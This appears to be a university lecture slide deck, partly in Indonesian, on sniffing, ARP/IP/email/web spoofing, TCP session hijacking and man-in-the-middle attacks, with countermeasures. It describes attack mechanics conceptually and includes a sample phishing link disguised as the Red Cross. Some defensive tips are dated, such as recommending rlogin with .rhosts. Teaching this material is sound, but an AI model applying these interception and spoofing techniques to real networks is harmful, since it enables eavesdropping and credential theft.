1
Politeknik Elektronika Negeri Surabaya
ITS - Surabaya
Dialog Attack
Sniffing – Spoofing Session Hijacking
Isbat Uzzin Nadhori
Informatical Engineering PENS-ITS
2
Types of Attacks
Attacks
Physical AccessAttacks
--Wiretapping/menyadap
Server HackingVandalism/perusakan
Dialog Attacks--
Eavesdropping(Mendengar yg tdk boleh)
Impersonation(meniru)
Message AlterationMerubah message
PenetrationAttacks
(Usaha menembus)
Social Engineering--
Opening AttachmentsPassword Theft
Information Theft
Scanning(Probing)
Break-inDenial ofService
Malware--
VirusesWorms
3
Sniffing
login:
dgame
passwd:
########
SNIFFER
Sniffing merupakan usaha untuk membaca dan menganalisa paket yang lewat di jaringan menggunakan program packet sniffing
4
Major Problems with Sniffing
Any mischievious machine can examine any packet on a BROADCAST medium
Ethernet is BROADCASTat least on the segments over which it travels
Getting passwords is the first step in exploiting a machine
email is plaintext and vulnerable
5
What does one sniff?
passwords
financial account information
confidential information
low-level protocol info to attackhardware addresses
IP addresses
routing, etc
6
Spoofing
In spoofing (fooling, deceiving), an attacker impersonates someone else.
7
Spoofing
Aaron Tom David
David is that you?
Yes I’m here!
In spoofing (fooling, deceiving), an attacker impersonates someone else.
8
Type of Spoofing
ARP Spoofing / MAC SpoofingAttacker change MAC address client with MAC Address Attacker
IP spoofingAttacker uses IP address of another computer to acquire information or gain access
Email spoofingAttacker sends email but makes it appear to come from someone else
Web spoofingAttacker tricks web browser into communicating with a different web server than the user intended.\
Non-network (social engineering)
9
MAC level Spoofing
Focus on ethernet (widespread use)
Cards have unique addresses at manufacturer
Many cards CAN be reconfigured by userbridge has no MAC address but sends with source address of
the originator
faking address has opportunity for mischief
10
Finding the Owner of a MAC Address
11
ARP Table Modifications
However Host A doesn’t know that Host B really did send the ARP reply.
In the previous example, attackers could spoof an ARP reply to Host A before Host B responded, indicating that the hardware address E0:E0:E0:E0:E0:E0 corresponds to Host B's IP address. Host A would then send any traffic intended for Host B to the attacker,
and the attacker could choose to forward that data (probably after some tampering) to Host B.
12
Spoofed Reply
13
ARP spoofing
What is ARP? IP->MAC mapping
Make some machine think that the IP address it is searching for is you.
How it works:Broadcast and ask if anyone knows
Response is typically from that IP
14
ARP spoofing (more)
If 2 machines (real and fake) respond, effect depends on OSsome OS overwrite earlier response
other OS ignore unless it’s current entry expires
Original can be disconnected byPower
Wiring (connectivity)
15
IP Spoofing
IP spoofing is the creation of TCP/IP packets with somebody else's IP address in the header.
Routers use the destination IP address to forward packets, but ignore the source IP address.
The source IP address is used only by the destination machine, when it responds back to the source.
When an attacker spoofs someone’s IP address, the victim’s reply goes back to that address.
Since the attacker does not receive packets back, this is called a one-way attack or blind spoofing.
16
Email Spoofing
3 Basic way to perform :– Aliasing
– Modify mail client
– Telnet to port 25
17
Email Spoofing
One simple form of email spoofing is to create a valid email account (on yahoo or hotmail) and put someone else’s name in the alias field.
In mail relaying, an attacker uses a mail server to send mail to someone in a different domain
When email is sent by a user, the From: address is not validated.
18
Web Spoofing
One way to lure people to a malicious site is to give it a URL that is similar to that of a legitimate site, e.g.,
www.paypai.com
wwwFirstNationalBank.com
Another way is for the attacker to provide HTML with a mislabeled link to another page, e.g., in an email. Example:
<a HREF="http://www.badhack.org"> American Red Cross</a>
19
Fake url
that is, sites claiming to be a particular Web site but, when clicked on, actually link to a hacker's Web site. The URL is the Web address for any Web site
There are some clues in it that may indicate it will lead you to a fake or a phishing site. Defence :
– One of the first rules of online security is to exercise caution at all times. Try to avoid clicking on links in pop-up ads or links in emails that seem to be phony or suspicious. A good general rule is to type the Web site address in your address bar directly, rather than use a link in an email message, especially if you are going to a financial site.
– You can check the URL in any email or on another Web site by simply holding your mouse above the link. The URL will appear in your browser or status bar (the bar that is usually at the bottom of your screen) and you can see what the name of the site is before you actually click on it.
– A fairly sure sign that a URL is fake is if the URL contains the "@" sign in the middle of the address. If a URL contains the "@" sign, the browser ignores everything to the left of the link. For example, if you go to a Web site that is [email protected], you are not going to the Paypal site at all. Legitimate sites and companies use a domain name as part of their name rather than the "@" sign.
– A dead giveaway for a fake URL or a fake Web site is basic spelling mistakes in the Web address itself. Some URLs look very much like the name of a well-known company, but there may be letters transposed or left out. An example might be "mircosoft.com" instead of "microsoft.com." These slight differences can be easy to miss, and that's what phishers are counting on.
– The popular Paypal site is a common target for phishers and scammers. Even if a URL contains the word "paypal," it may not be the authentic Paypal site. Some common URLs that will NOT lead you to the real Paypal site are: www.paypalsecure.com and [email protected].
20
TCP Session Hijacking
TCP session hijacking is when a hacker takes over a TCP session between two machines.
Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine.
21
Categories of TCP Session Hijacking
Based on the anticipation of sequence numbers there are two types of TCP hijacking:Man-in-the-middle (MITM)
Blind Hijack
22
Passive Sniffers
Passive sniffers monitors and sniffs packet from a network having same collision domain (i.e. network with a hub, as all packets are broadcasted on each port of hub.)
23
Active Sniffers
One way of doing so is to change the default gateway of the client’s machine so that it will route its packets via the hijacker’s machine.
This can be done by ARP spoofing (i.e. by sending malicious ARP packets mapping its MAC address to the default gateways IP address so as to update the ARP cache on the client, to redirect the traffic to hijacker).
24
Typical Session
Client(Browser)
ServerSession
Data
1: Request Connection 2: Create Session
3: Session Id
4: Subsequent Requests(Session id passed)
5: Validate Session
6: Retrieve Session Data
7: Successful response
25
Attack Methods
Guessing Session Idshorter length, predictable
Session Fixingpredictable, session created before authenticated
Security Vulnerabilities in Hopstrusting private networks, vulnerabilites in web servers, etc
Session Sniffing (typical on non SSL sessions)same subnet as client or server
Man in the Middle Attack (SSL)ARP Poisoning, DNS Spoofing
Cross Site Scripting (XSS)User trusting source, application vulnerability
26
Session Sniffing
Client(Browser)
ServerSession
Data
1: Request Connection 2: Create Session
3: Session Id
4: Subsequent Requests(Session id passed)
5: Validate Session
6: Retrieve Session Data
7: Successful response
Hacker
sniff
Request(session-id)
SuccessfulResponse
27
Man-in-the-middle (MITM)
A hacker can also be "inline" between B and C using a sniffing program to watch the sequence numbers and acknowledge numbers in the IP packets transmitted between B and C. And then hijack the connection.
This is known as a "man-in-the-middle attack".
28
Man in the Middle Attack Using Packet Sniffers
This technique involves using a packet sniffer to intercept the communication between client and the server.
Packet sniffer comes in two categories: Active sniffers
Passive sniffers.
29
Blind Hijacking [Shray Kapoor]
If you are NOT able to sniff the packets and guess the correct sequence number expected by server, you have to implement “Blind Session Hijacking.’’
You have to brute force 4 billion combinations of sequence number which will be an unreliable task.
30
Ways to Suppress a Hijacked Host to Send Packets
A common way is to execute a Denial-of-Service (DoS) attack against one end-point to stop it from responding.
This attack can be either
against the machine to force it to crash
or
against the network connection to force heavy packet loss.
Send packets with commands that request the recipient not to send back response.
31
Man in the Middle Attack
Client(Browser) Server
1: Request HTTPS Connection
3: Provide Server Certificate
With public key
5: Subsequent Requests
4: Provide HTTP Response
HackerMachine 1
Pass Session Id
2: Request HTTPS Connection
HackerMachine 2
Request(session-id)
SuccessfulResponse
6: Forward Request
Wait for Session to be created
32
MitM Attacks
‘Man-in-the-Middle’ refers to a machine that is set up so that traffic between two other machines must pass through the MitM machine.
Difficult to setup, especially over the Internet. Not so difficult in a LAN environment.
Provides no additional advantages over a ‘sniffer’ – is actually just a way to implement a sniffer.
Defense:Encryption – however, MitM can refer to an intermediate encrypter
Strong perimeter security for Internet MitM attacks.
Only secure as the weakest link – the MitM can attack from either end. So, even if you have strong security, but your partner does not, the MitM is possible from the other end.
33
Prevention of Sniffing
Segmentation into trustworthy segmentsbridges
better yet .. switched hubs
Not enough “not to allow sniffing”easy to add a machine on the net
may try using X-terminals vs workstations
34
Prevention of Sniffing(more)
Avoid password transmissionone solution is r..family
rlogin, rcp, rsh, etc
put trusted hosts in .rhosts
many SAs don’t want users to use them
Using encrypted passwordsKerberos
PGP public keys
35
Prevention MAC spoofing
VERY difficult
Intelligent hubscan be made to expect certain MACs on ports
but machines can still be swapped
physical measures
36
Prevention of ARP spoofing
Basic Premise: ARP TRUSTS RESPONSE
If the machine is one you need to trust:make a PERMANENT entry in arp cache
arp -p ...
Use an arp serverDon’t let the machine respond for itself
make administration a little more cumbersone but is probably worth it!
but.. server can be spoofed
37
Countermeasure IP Spoofing
Protect against with good firewall rules – keep your machines from launching a spoofed IP – router filtersLimit configuration access on machinesPrograms like arpwatch that keep track of IP/MAC pairingsThe best way to protect against source routing spoofing is to simply disable source routing at your routers.
Email SpoofingMost email servers today do not allow email relaying. They only allow emails to be sent to/from their range of IP addresses. They insure that the recipient’s domain is the same domain as the mail server. The attacker can run his own email server, but then he is easier to trace.Defense - Do not allow Email relaying on your STMP servers
Web SpoofingUse a ‘server-side certificate’. Still, users shouldExamine the browser location/status lineExamine links in HTML source code.Disable “active” content (Java, JavaScript, Active X) in the browser.Ensure that your browser starts on a “secure page” (a local HTML page)
38
Countermeasures - Encryption
The most effective is encryption such as IPSec. Internet Protocol Security has the ability to encrypt your IP packets based on
a Pre-Shared Key or with more complex systems like a Public Key Infrastructure PKI.
This will also defend against many other attack vectors such as sniffing.
The attacker may be able to passively monitor your connection, but they will not be able to read any data as it is all encrypted.
There might be actions an attacker could take against an IPSec enabled network, depending on if they use IKE-PSK or PKI to manage the encryption keys, but this would require an experienced hacker.
Don’t think that IPSec is the panacea to all your ills, there are IPSec cracking tools available on the internet that will attempt to guess the PSK and decrypt packets.
39
Countermeasures – Encrypted Application
Other countermeasures include encrypted applications like ssh (Secure SHell, an encrypted telnet) or ssl (Secure Sockets Layer, HTTPS traffic).
Again this reflects back to using encryption, but a subtle difference being that you are using the encryption within an application.
Be aware though that there are known attacks against ssh and ssl.
OWA, Outlook Web Access uses ssl to encrypt data between an internet client browser and the Exchange mail server, but tools like Cain & Abel can spoof the ssl certificate and mount a Man-In-The-Middle (MITM) attack and decrypt everything!